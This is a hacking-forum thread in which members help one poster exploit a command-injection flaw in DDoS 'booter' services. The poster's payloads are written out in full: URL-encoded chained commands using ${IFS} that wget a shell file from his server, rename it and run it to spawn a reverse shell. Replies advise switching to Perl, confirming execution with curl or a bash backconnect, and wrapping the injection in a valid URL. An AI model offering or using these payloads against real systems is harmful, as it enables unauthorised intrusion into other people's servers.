Login Register




The stories and information posted here are artistic works of fiction and falsehood. Only a fool would take anything posted here as fact.


booter exploitation filter_list
Author
Message
booter exploitation #1
I feel like such a noob for posting this, but I feel like I've tried everything and this is my last resort.

I've tried exploiting several booters using the vulnerability that Reiko made a thread about, and following the steps included in the thread.

I inserted commands with encoding and using ${IFS} for spaces but it doesn't seem to do anything. Example - %26%26${IFS}wget${IFS}http://my.server.ip/shell.txt Which converts to && wget http://my.server.ip/shell.txt

After I tried that, I tried using ; instead of && and that had the same affect - nothing. I'm inserting the commands in the host input field on layer-7 attacks because according to Reiko, are the ones that are vulnerable to this.

Reply

RE: booter exploitation #2
@Reiko might be able to help you with this

Reply

RE: booter exploitation #3
How do you know it doesn't do anything? Even if this command ran properly it would have ran Wget on the attack servers not the website hosting server.
Wild UMBREON appeared!
[impersonation intensifies]

Reply

RE: booter exploitation #4
Instead of trying to spawn a web shell, try to do a backconnect that way you can know if it is doing anything as its running on the server not booter host.
#MakeSinisterlySexyAgain

Reply

RE: booter exploitation #5
(09-01-2014, 05:59 PM)no__197 Wrote: How do you know it doesn't do anything? Even if this command ran properly it would have ran Wget on the attack servers not the website hosting server.

Wget isn't the only command I was running, I was just giving an example of how I was trying to run commands. Here's the commands I'm trying to do in order -

Code:
%26%26${IFS}wget${IFS}http://my.server.ip/shell.txt %26%26${IFS}mv${IFS}shell.txt${IFS}shell.php %26%26${IFS}php${IFS}shell.php

The second one is so that I can rename shell.txt to shell.php and the third one is so I can execute it. When it's executed, it connects back to my server and spawns a shell.


(09-01-2014, 06:22 PM)Adorapuff Wrote: Instead of trying to spawn a web shell, try to do a backconnect that way you can know if it is doing anything as its running on the server not booter host.

The PHP "shell.txt" file connects to my server and spawns a shell once it's executed.
Of course after I wget it, I rename it to shell.php then do %26%26${IFS}php${IFS}shell.php so that it gets executed, but for some reason, I never get a connection when listening.
(This post was last modified: 09-01-2014, 08:03 PM by Crypt.)

Reply

RE: booter exploitation #6
(09-01-2014, 08:00 PM)Crypt Wrote: Wget isn't the only command I was running, I was just giving an example of how I was trying to run commands. Here's the commands I'm trying to do in order -

Code:
%26%26${IFS}wget${IFS}http://my.server.ip/shell.txt %26%26${IFS}mv${IFS}shell.txt${IFS}shell.php %26%26${IFS}php${IFS}shell.php

The second one is so that I can rename shell.txt to shell.php and the third one is so I can execute it. When it's executed, it connects back to my server and spawns a shell.



The PHP "shell.txt" file connects to my server and spawns a shell once it's executed.
Of course after I wget it, I rename it to shell.php then do %26%26${IFS}php${IFS}shell.php so that it gets executed, but for some reason, I never get a connection when listening.

Yes, but you have to keep in mind the commands you are trying to run are being ran on the attack server.
Chances are that even if your shell.php file downloaded the server won't even have PHP installed.
Try something to actually confirm your command ran, such as curl to a website you own or some IP logger and then checking the access.log to see if it visited or just a bash one-liner backconnect.

If you own the server you tried to wget the shell.txt from then check access.logs of that box to see if it connected.
Wild UMBREON appeared!
[impersonation intensifies]

Reply

RE: booter exploitation #7
Alright I'm tired of you spamming my skype asking how to do this

1. Use a perl script, not a php one
2. Success

Reply

RE: booter exploitation #8
(09-01-2014, 08:36 PM)chronical Wrote: Alright I'm tired of you spamming my skype asking how to do this

1. Use a perl script, not a php one
2. Success

Are PHP scripts not supported?
#MakeSinisterlySexyAgain

Reply

RE: booter exploitation #9
(09-01-2014, 08:44 PM)Adorapuff Wrote: Are PHP scripts not supported?

I guess that's one way of saying it.

You see, when you execute commands through the GUI of the booter it sends those commands to the attack server. And considering the fact that it's an attack server and nothing more, there's really no need for PHP so 99% of the time, PHP isn't installed on it. Where as perl is built in on all linux machines, so it's just better to use it instead.

Reply

RE: booter exploitation #10
You need to form a valid URL with your attack as well.
http://loli.dance/?test%26%26commands for example
PGP
Sign: F202 79C9 76F7 40BB 54EC 494F 5DEF 1D70 14C1 C4CC
Encrypt: A5B3 1B21 55E1 80AF 4C6E DE83 467B 8EFC 3DEE 681C
Auth: CD55 E8A5 1A08 2933 8BA6 BC88 D81F 1943 739A 3C47

Reply